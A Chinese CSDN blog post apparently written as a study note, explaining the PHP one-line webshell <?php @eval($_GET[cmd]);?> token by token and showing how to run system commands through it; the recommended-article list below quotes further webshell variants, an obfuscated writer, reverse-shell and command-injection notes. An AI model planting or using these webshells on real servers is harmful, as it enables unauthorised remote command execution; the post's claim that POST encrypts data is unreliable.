一句话木马详细解说

最新推荐文章于 2024-08-06 22:50:12 发布

Marx_Otto

最新推荐文章于 2024-08-06 22:50:12 发布

阅读量1.2k

点赞数 3

分类专栏：笔记文章标签：安全 php shell 恰饭

本文链接：https://blog.csdn.net/weixin_45441727/article/details/116172051

版权

笔记专栏收录该内容

72 篇文章 17 订阅

订阅专栏

一句话木马

<?php  @eval($_GET[cmd]);?>

<?php
php文件头

?>

@
屏蔽错误
如果加上就是不显示错误信息
不然就会显示
Warning:.....
Warning:.....
Warning:.....

eval
这是一个函数它会把后面括号的代码当做php代码运行。
这是一个危险函数，一般网站会把它过滤屏蔽。

$
这是一个变量源名

GET
获取表单
POST
也是获取表单，不过它会进行加密。使别人无法看到。

cmd
一个参数，到时候连接时用的，可改。
有些情况下会用''
一般来说都是因为存在空格

<?php  @eval($_GET[cmd]);?>
总体的意思就是把（）内的代码作为php代码执行，获取有关cmd参数的表单

连接一句话木马

xx.php?cmd=system（ls）;
cmd参数就是[]里面的，可自定义
system一个系统函数执行系统命令

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Marx_Otto

关注关注

3
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

流量分析-Wireshark -操作手册（不能说最全，只能说更全）

路baby的博客

03-22

1万+

流量分析-Wireshark -操作手册（不能说最全，只能说更全）基于各种比赛做的总解基于协议过滤⼿法👍 常用筛选命令方法常⽤快捷键👍 数据包筛选顶峰相见

20201231WEB渗透学习之Linux内核提权

qq_45290991的博客

01-01

893

我们都知道，如果已经获取了目标服务器（网站）的后门shell，那么我们接下啦要做的事情是什么？？？？对，就是进程迁移（把自己的shell隐藏到一个不容易被肉鸡检测到的地方，比如说一个很深的目录下），但是要执行进程迁移，我们需要root权限，所以实际上我们应该先提升攻击者的权限，来使得我们有着更高的权限（比如说root）去操控肉鸡。在提升权限的过程中，我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开篇列出来这个工具的命令，然后后面接上一些实际例子，这样有好处也

1 条评论您还未登录，请先登录后发表或查看评论

PHP一句话木马小结与SQL语句写一句话木马

09-11

302

一、基础类的一句话--功能仅限于验证漏洞了，实际中非常容易被查出出来： <?php @eval($_GET["code"])?> <?php @system($_POST["cmd"])?> 二、编码的替换的类型： <?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_dec...

一句话木马原理与实战

07-30

3398

一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战介绍 一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终有强大的作用。常用一句话木马 php一句话木马：　　 <?php @eval($_POST[value]);?> 　　 aspx一句话木马：　　<%@ Page Language=“Jscript”%> 　　<%eval(Re...

WebShell及一句话木马

最新发布

qq_67812668的博客

08-06

1037

1.一句话木马的原理将一句话木马插入到asp文件中（包括asa.cdx.cer文件），该语句将会作为触发，接收入侵者通过客户端提交的数据，执行并完成相应的入侵操作。客户端则用来向服务端提交控制数据，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件。 2.通常WebShell客户端怎么绕过WAF1).绕过前台脚本检测扩展名上传Webshell当用户在客户端上传文件的时候，客户端与服务器没有进行任何的信息交互，判断上传文件的类型是前台脚本文件来判断。

文件上传漏洞------一句话木马原理解析

m0_69151365的博客

03-11

2476

这是一个最简单的一句话木马，我们用GET传参接受了两个参数，其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval，但是很容易被杀，在我个人电脑上我们可以关闭保护软件，但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码，完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许，刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。

你真的了解一句话木马吗？

Elite的博客

04-14

1万+

一句话木马是大多网安人在初步学习中，遇到的一种简单的木马文件，但是你真的了解它吗？

2017-01-27-一句话木马原理详解

Be Smart

03-17

4842

layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者：愤怒的小辣椒链接：https://www.zhihu.com/question/269213687/answer/1088999932 来源：知乎著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。首先理解，eval()是把里面的内容按照php代码去执行菜刀通过你的一句话木马去进行http请求，然后用经过base64编.

一句话木马

qq_43814486的博客

04-22

2393

条件：1.有服务器的写入权限。2.知道服务器的地址。目的：将我们的一句话木马插入到服务器的asp文件中。例如：在服务器的地址里创建一个叫virus.php文件里边放代码： <?php system($_GET['cmd'])?> 然后我们就可以通过URL去操控服务器的cmd了，例如访问： http://127.0.0.1/virus.php?cmd=ipconfig 相当于在服...

网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2

weixin_52796034的博客

11-05

908

反弹shell（Reverse Shell）是一种计算机安全和网络攻击技术，通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令，获取系统访问权限，以及进行横向移动和数据操作。反弹shell的工作方式如下：攻击者和目标系统之间建立连接：通常，攻击者首先在目标系统上部署一个恶意程序（例如Trojan或后门），该程序会与攻击者的控制服务器建立连接。目标系统反弹连接：一旦恶意程序在目标系统上执行，它会尝试与攻击者的控制服务器建立连接。

DOS 批处理

墨鱼菜鸡

07-11

1250

From:http://www.jb51.net/article/97204.htm From:http://www.92to.com/bangong/2016/04-08/2998914.html 百度文库：目前为止最全的批处理教程批处理经典入门教程批处理的本质，是一堆DOS命令按一定顺序排列而形成的集合。 ...

Web安全-一句话木马

热门推荐

道阻且长，行则将至。

05-08

32万+

在很多的渗透过程中，渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是什么呢?

文件上传漏洞原理

m0_57379855的博客

03-09

1229

文件上传漏洞原理文件上传漏洞原理文件上传漏洞index.phpupload_server.php实践webshell介绍网站控制工具中国蚁剑weevely文件上传漏洞危害黑链挖矿敏感文件泄漏靶场安装靶场练习文件上传漏洞发现与利用文件上传漏洞防御文件上传漏洞原理文件上传漏洞可以利用WEB上传一些特定的文件.一般情况下文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力. 文件上传本身是web中最为常见的一种功能需求,关键是文件上传之后服务器端的处理’ 解释文件的过

php一句话工作原理,一句话木马的工作原理

weixin_31847389的博客

03-24

2155

一句话木马的工作原理：一句话木马分析服务端与客户端。'一句话木马'服务端(是用于本地的html提交脚本木马文件)就是我们要用来插入到asp文件中的asp语句，(不仅仅是以asp为后缀的数据库文件)，该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为其中value可以自己修改'一句话木马'客户端(远程服务器上被插入一句话的asp可执行文件)用来向服务端提交...

CTFHUB-RCE

cainiao17441898的博客

03-14

350

eval执行查看源码后发现。让把命令赋值给cmd然后执行先看一下根目录下有什么，命令：?cmd=system(‘ls’); 再回到上一级看看。发现了flag 打开flag就行了。

渗透干货｜史上最全一句话木马

分享Python知识

04-11

5187

渗透干货｜史上最全一句话木马

远程控制——一句话木马

Coffilater的博客

11-13

6699

两个物理机要连在同一个子网，都采用桥接方式普通用户有很多权限限制，所以要用root权限默认打开目录是在var/www/html 所以直接在该目录下创建shell.php文件 http默认端口为80，如果是别的端口，要在后面加上端口确定的号码 nmap扫描端口是否开放 apach 开放 service apache2 start 开放端口在Kali Linxu中使用默认端口打开Apache服务开放之后再扫描，可以看到端口已经开放 http://192.168.43.7

CTFHub技能树笔记之RCE：命令注入、过滤cat、过滤空格

weixin_48799157的博客

03-28

8842

小白一个，记录解题过程，如有错误请指正！一、命令注入补充知识点：命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数，而且输入参数是可控的，如果黑客拼接了注入命令，就可以进行非法操作了。 Windows系统支持的管道符如下： 1. “|”：直接执行后面的语句。 2. “||”：如果前面的语句执行失败，则执行后面的语句，前面的语句只能为假才行。 3. “&”：两条命令都执行，如果前面的语句为假则直接执行后面的语句，前面的语句可真可假。 4. “&&...